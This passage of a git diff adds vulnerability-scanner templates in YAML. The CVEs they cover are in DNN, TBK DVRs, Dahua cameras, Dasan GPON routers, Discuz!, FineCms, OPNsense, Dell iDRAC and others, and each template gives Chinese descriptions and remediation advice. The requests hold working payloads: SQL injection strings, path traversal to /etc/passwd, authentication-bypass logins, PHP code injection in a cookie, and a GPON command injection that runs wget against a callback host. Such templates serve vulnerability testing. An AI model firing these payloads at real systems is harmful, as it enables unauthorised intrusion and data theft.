服务器端请求伪造(SSRF)漏洞 + DNN(前称DotNetNuke)是美国DNN公司的一套由微软支持、基于ASP.NET平台的开源内容管理系统(CMS)。该系统具有易于安装、可扩展、功能丰富等特点。 + + DNN 9.2.0之前版本中的DnnImageHandler类存在服务器端请求伪造漏洞。远程攻击者可利用该漏洞访问有关内部网络资源的信息。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3 + + 临时修复方案: + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + - type: status + status: + - 500 + matchers-condition: and + path: + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' + method: GET diff --git "a/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-9822.yaml" "b/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-9822.yaml" new file mode 100755 index 000000000..8e11fb0be --- /dev/null +++ "b/config/51pwn/yaml/DNN\357\274\210\345\211\215\347\247\260DotNetNuke\357\274\211/CVE-2017-9822.yaml" @@ -0,0 +1,38 @@ +id: CVE-2017-9822 +info: + name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution + author: + - l0ne1y + description: |- + DotNetNuke 远程代码执行漏洞 + DNN(又名DotNetNuke)是美国DNN公司的一套由微软支持、基于ASP.NET平台的开源内容管理系统(CMS)。该系统具有易于安装、可扩展、功能丰富等特点。 + + DotNetNuke 9.1.1之前版本中存在输入验证错误漏洞。远程攻击者可利用该漏洞执行代码。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://www.dnnsoftware.com/community/security/security-center + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '[extensions]' + - for 16-bit app support + - type: status + status: + - 404 + matchers-condition: and + raw: + - | + GET /__ HTTP/1.1 + Host: {{Hostname}} + Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini diff --git a/config/51pwn/yaml/DVR/CVE-2018-9995.yaml b/config/51pwn/yaml/DVR/CVE-2018-9995.yaml new file mode 100755 index 000000000..34d33f2d9 --- /dev/null +++ b/config/51pwn/yaml/DVR/CVE-2018-9995.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-9995 +info: + name: TBK DVR4104/DVR4216 Devices - Authentication Bypass + author: + - l0ne1y + description: |- + TBK DVR4104和DVR4216登陆绕过漏洞 + TBK DVR4104和DVR4216都是高清数字录像机设备。 + + TBK DVR4104和DVR4216中存在安全漏洞。远程攻击者可借助Cookie: uid=admin包头利用该漏洞绕过身份验证。 + severity: critical + remediation: |- + 官方修复建议: + 用户可参考如下供应商提供的安全公告获得补丁信息: + http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018- + 9995.html#more + + 临时修复建议: +
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"uid":' + - '"pwd":' + - '"view":' + - playback + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/device.rsp?opt=user&cmd=list' + method: GET diff --git a/config/51pwn/yaml/Dahua IPC/CVE-2021-33044.yaml b/config/51pwn/yaml/Dahua IPC/CVE-2021-33044.yaml new file mode 100755 index 000000000..c9996ef5e --- /dev/null +++ b/config/51pwn/yaml/Dahua IPC/CVE-2021-33044.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-33044 +info: + name: Dahua IPC/VTH/VTO devices Authentication Bypass + author: + - l0ne1y + description: |- + Dahua IPC设备身份认证绕过漏洞 + Dahua IPC是中国大华(Dahua)公司的大华的一系列工控机。 + + Dahua IPC存在安全漏洞,攻击者可利用该漏洞通过构造恶意数据包绕过设备身份验证 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.dahuasecurity.com/support/cybersecurity/details/957 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - '"result":true' + - id + - params + - session + extractors: + - type: regex + regex: + - ',"result":true,"session":"([a-z]+)"\}' + group: 1 + part: body + matchers-condition: and + raw: + - | + POST /RPC2_Login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Connection: close + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} diff --git a/config/51pwn/yaml/Dairy Farm Shop Management System/CVE-2020-5307.yaml b/config/51pwn/yaml/Dairy Farm Shop Management System/CVE-2020-5307.yaml new file mode 100755 index 000000000..7abfe8603 --- /dev/null +++ b/config/51pwn/yaml/Dairy Farm Shop Management System/CVE-2020-5307.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-5307 +info: + name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection + author: + - gy741 + description: |- + Dairy Farm Shop Management System SQL注入漏洞 + Dairy Farm Shop Management System是一套基于PHP和MySQL的奶牛场管理系统。 + + Dairy Farm Shop Management System 1.0版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://phpgurukul.com/ + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: header + words: + - add-category.php + - type: status + status: + - 302 + matchers-condition: and + raw: + - | + POST /dfsms/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= diff --git a/config/51pwn/yaml/Dasan GPON/CVE-2018-10562.yaml b/config/51pwn/yaml/Dasan GPON/CVE-2018-10562.yaml new file mode 100755 index 000000000..be959290c --- /dev/null +++ b/config/51pwn/yaml/Dasan GPON/CVE-2018-10562.yaml @@ -0,0 +1,40 @@ +id: CVE-2018-10562 +info: + name: Dasan GPON Devices - Remote Code Execution + author: + - l0ne1y + description: |- + Dasan GPON家庭路由器命令注入漏洞 + Dasan GPON是韩国Dasan公司的一款家用路由器产品。 + + Dasan GPON家庭路由器中存在命令注入漏洞,该漏洞源于用户再次访问/diag.html页面时路由器将因特网包探索器的结果保存在/tmp中并将它传输给用户。攻击者可通过向GponForm/diag_Form URI发送带有‘dest_host’参数的diag_action=ping请求利用该漏洞执行命令并检索输出。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://www.dasannetworks.com + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 + stop-at-first-match: true diff --git a/config/51pwn/yaml/Dayrui FineCms/CVE-2017-11584.yaml b/config/51pwn/yaml/Dayrui FineCms/CVE-2017-11584.yaml new file mode 100755 index 000000000..7123bbb97 --- /dev/null +++ b/config/51pwn/yaml/Dayrui FineCms/CVE-2017-11584.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-11584 +info: + name: Finecms SQL注入漏洞 + author: + - l0ne1y + description: |- + Finecms SQL注入漏洞 + Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。 + + dayrui FineCms 5.0.9版本中存在SQL注入漏洞。远程攻击者可借助action=module、action=member、action=form或action=related请求中的‘field’参数利用该漏洞注入任意的SQL命令。 + severity: critical + remediation: |- + **官方修复方案** + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:http://www.finecms.net/ + 1、建议用户到官方获取最新补丁或者最新版本程序: + + **临时修复方案** + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - '{{md5(veritify)}}' + path: + - '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({{veritify}})%27' + method: GET +variables: + veritify: '{{rand_int(200000000, 210000000)}}' diff --git a/config/51pwn/yaml/Deciso OPNsense/CVE-2020-23015.yaml b/config/51pwn/yaml/Deciso OPNsense/CVE-2020-23015.yaml new file mode 100755 index 000000000..1317aea39 --- /dev/null +++ b/config/51pwn/yaml/Deciso OPNsense/CVE-2020-23015.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-23015 +info: + name: OPNsense 20.1.5. Open Redirect + author: + - 0x_akoko + description: "Deciso OPNsense URL重定向漏洞\n Deciso OPNsense是荷兰Deciso公司的一套基于FreeBSD的开源防火墙和路由软件。\n\nOPNsense + 20.1.5版本及之前版本存在安全漏洞,该漏洞源于发现一个开放重定向问题。登录页面的重定向参数“url”没有被过滤。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + /~https://github.com/opnsense/core + + 临时修复方案:
1、代码固定跳转地址,不让用户控制变量。
2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。
3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$ + path: + - '{{BaseURL}}/?url=http://example.com' + method: GET diff --git a/config/51pwn/yaml/Dell EMC/CVE-2018-1207.yaml b/config/51pwn/yaml/Dell EMC/CVE-2018-1207.yaml new file mode 100755 index 000000000..2c300cc3a --- /dev/null +++ b/config/51pwn/yaml/Dell EMC/CVE-2018-1207.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-1207 +info: + name: Dell iDRAC7/8 Devices - Remote Code Injection + author: + - l0ne1y + description: |- + Dell EMC iDRAC7和iDRAC8代码执行漏洞 + + Dell EMC iDRAC7和iDRAC8都是美国戴尔(Dell)公司的包含硬件和软件的系统管理解决方案。该方案为Dell PowerEdge系统提供远程管理、崩溃系统恢复和电源控制等功能。 + + Dell EMC iDRAC7和iDRAC8 2.52.52.52之前版本中存在安全漏洞。远程攻击者可借助CGI变量利用该漏洞执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: response + words: + - 'calling init: /lib/' + path: + - '{{BaseURL}}/cgi-bin/login?LD_DEBUG=files' + method: GET diff --git a/config/51pwn/yaml/Deltek Maconomy/CVE-2019-12314.yaml b/config/51pwn/yaml/Deltek Maconomy/CVE-2019-12314.yaml new file mode 100755 index 000000000..6041de744 --- /dev/null +++ b/config/51pwn/yaml/Deltek Maconomy/CVE-2019-12314.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-12314 +info: + name: Deltek Maconomy 2.2.5 Local File Inclusion + author: + - l0ne1y + description: |- + Deltek Maconomy 任意文件读取漏洞 + Deltek Maconomy是美国Deltek公司的一套企业资源计划(ERP)软件。 + + Deltek Maconomy 2.2.5版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.deltek.com + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Discuz!/Discuz-V72-SQLi.yaml b/config/51pwn/yaml/Discuz!/Discuz-V72-SQLi.yaml new file mode 100755 index 000000000..1d196efed --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-V72-SQLi.yaml @@ -0,0 +1,37 @@ +id: Discuz-V72-SQLi +info: + name: Discuz7.2 SQL注入漏洞 + author: + - l0ne1y + description: |- + Discuz! v7.2 SQL注入漏洞 + Discuz!一套通用的社区论坛软件系统。 + + Discuz! v7.2存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 4、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 5、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 6、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + condition: and + words: + - 81dc9bdb52d04dc20036dbd8313ed055 + - 'Discuz! info: MySQL Query Error' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23' + method: GET diff --git a/config/51pwn/yaml/Discuz!/Discuz-WechatPlugins-Unauth.yaml b/config/51pwn/yaml/Discuz!/Discuz-WechatPlugins-Unauth.yaml new file mode 100755 index 000000000..d8bbcd15b --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-WechatPlugins-Unauth.yaml @@ -0,0 +1,37 @@ +id: Discuz-WechatPlugins-Unauth +info: + name: Discuz Wechat Plugins Unauth + author: + - l0ne1y + description: |- + Discuz! Wechat插件越权登录漏洞 + Discuz!一套通用的社区论坛软件系统。 + + Discuz! 存在越权漏洞,越权漏洞包括水平越权、垂直越权和未授权访问。在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 +requests: +- matchers: + - type: word + condition: and + part: header + words: + - set-cookie + - auth + - location + - wsq.discuz.com + - type: status + status: + - 302 + matchers-condition: and + path: + - '{{BaseURL}}/plugin.php?id=wechat:wechat&ac=wxregister' + method: GET diff --git a/config/51pwn/yaml/Discuz!/Discuz-ece-language.yaml b/config/51pwn/yaml/Discuz!/Discuz-ece-language.yaml new file mode 100755 index 000000000..dfd379c6a --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-ece-language.yaml @@ -0,0 +1,55 @@ +id: Discuz-ece-language +info: + name: Discuz ML! V3.X include_once template 代码执行 + author: + - 折跃 + description: |- + Discuz! ML V3.X 代码执行漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! ML V3.X 存在代码执行漏洞,攻击者可利用该漏洞执行系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、验证请求内容,过滤恶意代码及各种绕过方式,如大小写、BASE64编码,限制提交。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + extractors: + - name: tmpCookie + type: regex + regex: + - httponly,(.*)language' + group: 1 + part: body + internal: true + path: + - '{{BaseURL}}/{{varPath}}' + attack: batteringram + method: GET + payloads: + varPath: + - portal.php + - forum.php + - search.php + - home.php + - member.php + - group.php + - connect.php + - plugin.php + headers: + Cookie: '{{tmpCookie}}language=en''.print_r(md5(''123'')).'';' + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Discuz!/Discuz-info-api.yaml b/config/51pwn/yaml/Discuz!/Discuz-info-api.yaml new file mode 100755 index 000000000..ccbead629 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-info-api.yaml @@ -0,0 +1,32 @@ +id: Discuz-info-api +info: + name: Discuz x2.5 物理路径泄露漏洞 + author: + - 折跃 + description: |- + Discuz! x2.5 物理路径泄露漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! x2.5存在物理路径泄露漏洞。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、屏蔽报错信息输出 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - "regex('Warning:[^\r\n]+or an integer in ([^<]+)api\\.php on line + (\\d+)',body)" + path: + - '{{BaseURL}}/api.php?mod[]=Seay' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-lfd-hux_wx.yaml b/config/51pwn/yaml/Discuz!/Discuz-lfd-hux_wx.yaml new file mode 100755 index 000000000..902583058 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-lfd-hux_wx.yaml @@ -0,0 +1,36 @@ +id: Discuz-lfd-hux_wx +info: + name: Discuz! hux_wx_hux_wx 任意文件包含漏洞 + author: + - 折跃 + description: |- + Discuz! hux_wx_hux_wx插件文件包含漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz!的hux_wx_hux_wx插件存在本地文件包含漏洞,攻击者可利用该漏洞访问受限目录之外的位置进行文件包含攻击,以导致包含本地文件时执行代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,需禁止%00截断(PHP更新到最新版本)。PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'User-agent') + - contains(body,'Disallow') + path: + - '{{BaseURL}}/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=robots.txt%00' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-lfd-milu_seotool.yaml b/config/51pwn/yaml/Discuz!/Discuz-lfd-milu_seotool.yaml new file mode 100755 index 000000000..06feae94e --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-lfd-milu_seotool.yaml @@ -0,0 +1,36 @@ +id: Discuz-lfd-milu_seotool +info: + name: Discuz! milu_seotool插件本地文件包含漏洞 + author: + - 折跃 + description: |- + Discuz! milu_seotool插件本地文件包含漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz!的milu_seotool插件存在本地文件包含漏洞,攻击者可利用该漏洞访问受限目录之外的位置进行文件包含攻击,以导致包含本地文件时执行代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,需禁止%00截断(PHP更新到最新版本)。PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'User-agent') + - contains(body,'Disallow') + path: + - '{{BaseURL}}/plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-sqli-batch_common.yaml b/config/51pwn/yaml/Discuz!/Discuz-sqli-batch_common.yaml new file mode 100755 index 000000000..a331847c0 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-sqli-batch_common.yaml @@ -0,0 +1,38 @@ +id: Discuz-sqli-batch_common +info: + name: Discuz! batch.common.php SQL注入漏洞 + author: + - 折跃 + description: |- + Discuz! batch.common.php SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! batch.common.php存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + path: + - '{{BaseURL}}/batch.common.php?action=modelquote&cid=1&name=spacecomments,(SELECT%203284%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,105,99,104,58),(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,107,111,117,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-sqli-forummission.yaml b/config/51pwn/yaml/Discuz!/Discuz-sqli-forummission.yaml new file mode 100755 index 000000000..13abf3aee --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-sqli-forummission.yaml @@ -0,0 +1,38 @@ +id: Discuz-sqli-forummission +info: + name: Discuz! forummission.php SQL注入漏洞 + author: + - 折跃 + description: |- + Discuz! forummission.php SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! forummission.php存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 